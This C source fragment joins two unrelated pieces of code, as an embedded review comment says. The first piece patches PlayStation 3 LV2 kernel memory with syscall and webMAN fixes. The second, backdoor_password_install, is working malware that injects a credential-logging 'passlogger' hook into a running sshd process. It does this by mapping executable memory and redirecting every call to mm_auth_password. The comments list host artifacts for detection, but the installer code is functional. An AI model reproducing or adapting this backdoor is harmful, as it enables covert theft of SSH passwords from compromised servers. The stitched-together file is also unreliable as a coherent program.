    restore_syscall8[0]= SYSCALL_BASE + (u64) (SYSCALL_SK1E * 8ULL); // (8*8)
    restore_syscall8[1]= peekq(restore_syscall8[0]);

    u64 id[2];
    // copy the id
    id[0]= 0x534B314500000000ULL | (u64) PAYLOAD_OFFSET;
    id[1] = SYSCALL_BASE + (u64) (SYSCALL_SK1E * 8ULL); // (8*8)
    lv2_memcpy(0x80000000000004f0ULL, (u64) &id[0], 16);

    u64 inst8 = peekq(0x8000000000003000ULL); // get TOC
    lv2_memcpy(0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x28), (u64) &inst8, 8);

    inst8 = 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x20); // syscall_8_desc - sys8
    lv2_memcpy(SYSCALL_BASE + (u64) (SYSCALL_SK1E * 8ULL), (u64) &inst8, 8);

    usleep(1000);

    remove_lv2_memcpy();

    pokeq(0x80000000007EF000ULL, 0ULL); // BE Emu mount
    pokeq(0x80000000007EF220ULL, 0ULL);

    //Patches from webMAN
    pokeq(0x8000000000296264ULL, 0x4E80002038600000ULL );
    pokeq(0x800000000029626CULL, 0x7C6307B44E800020ULL ); // fix 8001003C error
    pokeq(0x8000000000057020ULL, 0x63FF003D60000000ULL ); // fix 8001003D error
    pokeq(0x80000000000570E4ULL, 0x3FE080013BE00000ULL ); // fix 8001003E error
    pokeq(0x8000000000057090ULL, 0x419E00D860000000ULL );
    pokeq(0x8000000000057098ULL, 0x2F84000448000098ULL );
    pokeq(0x800000000005AA54ULL, 0x2F83000060000000ULL ); // fix 80010009 error
    pokeq(0x800000000005AA68ULL, 0x2F83000060000000ULL ); // fix 80010019 error

    /* BASIC PATCHES SYS36 */
    // by 2 anonymous people
    _poke32(0x057094, 0x60000000); // already set in E3 "nop"
    PATCH_JUMP(0x05709C, 0x57134); // already set in E3
    _poke32(0x05AA58, 0x60000000); // already set in E3 "nop"
    _poke32(0x05AA6C, 0x60000000); // already set in E3 "nop"
    _poke( 0x057020, 0x63FF003D60000000); // fix 8001003D error "ori %r31, %r31, 0x3D\n nop\n"
    _poke32(0x0570E8, 0x3BE00000); // fix 8001003E error -- 3.55 ok in 0x055F64 "li %r31, 0"
    PATCH_JUMP(0x0570EC, 0x56FF8); // fix 4.21 added error

    /** Rancid-o: Fix 0x8001003C error (incorrect version in sys_load_param) - It is present in the new game updates **/
    _poke(0x296268, 0x386000007C6307B4);
    _poke32(0x296270, 0x4E800020);

    /*
     * -002c3cf0 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d8 aa 1d |....|.#x|}.xK...|
     * +002c3cf0 f8 01 00 b0 7c 9c 23 78 4b d4 01 88 4b d8 aa 1d |....|.#xK...K...|
     * (openhook jump - 0x3E80)
     */
    PATCH_JUMP(0x2C257C, (PAYLOAD_OFFSET+0x30)); // patch openhook

#ifdef CONFIG_USE_SYS8PERMH4
    PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x18));
#endif
}
/*
 * backdoor_password_install -- process-injection installer for the
 * "passlogger" credential-logging hook into a running sshd (ctx->pid),
 * using the tool's _peek/_poke/_mmap helpers.
 *
 * NOTE(review): this function belongs to a different tool than the
 * load_payload_* routines above (its _peek/_poke take a pid and a pointer,
 * not an LV2 address); this file appears to be a concatenation of two
 * unrelated sources.
 *
 * Observable host artifacts, for detection / incident response:
 *   - a 0x1000-byte anonymous RWX MAP_FIXED|MAP_SHARED mapping inside the
 *     sshd process, placed by find_hole near the first call site of
 *     mm_auth_password (an RWX anonymous region in sshd is itself anomalous);
 *   - every call site of mm_auth_password (located through the
 *     "%s: waiting for MONITOR_ANS_AUTHPASSWORD" debug string) has its
 *     4-byte call displacement rewritten to point at that mapping, so the
 *     in-memory .text no longer matches the on-disk binary;
 *   - the hook blob's two-slot import table holds ctx->config_addr and the
 *     real mm_auth_password address.
 * Only the privilege-separated layout is handled: use_privsep == 0 aborts
 * through error(). Nothing is returned; failures are reported via error().
 */
void backdoor_password_install(inject_ctx *ctx) {
    u32 use_privsep_val=0;
    u64 use_privsep;
    u64 *mm_auth_password_calls = NULL;
    int i, n_mm_auth_password_calls;
    u64 diff=0, hole_addr=0;
    u8 *evil_bin;

    mod_banner("installing passlogger backdoor");

    // working copy of the hook blob; NOTE(review): malloc is unchecked and
    // evil_bin is never freed in this function
    evil_bin = malloc(hook_passlog_bin_len);
    memcpy(evil_bin, hook_passlog_bin, hook_passlog_bin_len);
    // two u64 slots right after the blob's 8-byte header, filled in below
    u64 *import_table = (u64*)(evil_bin + 8);

    use_privsep = resolve_symbol_tab(ctx, "use_privsep");
    if (use_privsep == 0) error("could not locate use_privsep :(");
    info("use_privsep\t\t= 0x%llx", use_privsep);

    _peek(ctx->pid, use_privsep, &use_privsep_val, 4);
    info("use_privsep\t\t= 0x%x", use_privsep_val);

    if (use_privsep_val == 0) {
        error("pass logging for PRIVSEP_OFF currently not supported.");
    }

    u64 mm_auth_password = sub_by_debugstr(ctx, "%s: waiting for MONITOR_ANS_AUTHPASSWORD");
    info("mm_auth_password\t\t= 0x%llx", mm_auth_password);

    n_mm_auth_password_calls = find_calls(&mm_auth_password_calls, mm_auth_password);
    if (n_mm_auth_password_calls == 0) error("No calls to mm_auth_password found.");

    hole_addr = find_hole(ctx, mm_auth_password_calls[0], 0x1000);
    if (hole_addr == 0) {
        error("unable to find neighborly hole.");
    }
    info("found usable hole @ 0x%lx", hole_addr);

    _mmap(
        ctx, (void*)hole_addr, 0x1000,
        PROT_READ| PROT_WRITE | PROT_EXEC,
        MAP_ANONYMOUS | MAP_SHARED | MAP_FIXED,
        0, 0
    );

    // re-read; the value is not used again after this point
    _peek(ctx->pid, use_privsep, &use_privsep_val, 4);

    // Patch mm_auth_password
    for (i = 0; i < n_mm_auth_password_calls; i++) {
        // rel32 displacement from the end of the 5-byte call to hole_addr (mod 2^32)
        diff = 0x100000000-(mm_auth_password_calls[i]-hole_addr)-5;
        info(
            "building a bridge [0x%lx->0x%lx] .. opcode = [E8 %02X %02X %02X %02X]",
            mm_auth_password_calls[i], hole_addr,
            diff & 0xff, (diff>>8)&0xff, (diff>>16)&0xff, (diff>>24)&0xff
        );
        _poke(ctx->pid, mm_auth_password_calls[i]+1, &diff, 4);
    }

    import_table[0] = ctx->config_addr;
    import_table[1] = mm_auth_password;

    _poke(ctx->pid, hole_addr, evil_bin, hook_passlog_bin_len);

    free(mm_auth_password_calls);
}